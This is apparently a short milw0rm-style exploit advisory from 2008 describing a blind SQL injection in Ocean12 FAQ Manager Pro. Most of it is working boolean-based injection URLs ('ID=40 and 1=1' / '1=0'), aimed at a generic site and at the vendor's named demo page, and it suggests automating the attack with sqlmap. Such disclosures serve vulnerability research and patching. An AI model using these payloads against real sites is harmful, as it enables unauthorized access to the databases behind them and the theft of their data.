######################################################### --------------------------------------------------------- Portal Name: Ocean12 FAQ Manager Pro Author : Mountassif Moad Evil Finger / v4 Team Vulnerability : Blind Sql Injection --------------------------------------------------------- ######################################################### Exploit : site.com/?Action=Cat&ID=40%20and%201=1 true site.com/?Action=Cat&ID=40%20and%201=0 false Demo : http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false # you can exploting the bug white blind sql automatic toolz such as sqlmap or ... # milw0rm.com [2008-11-28]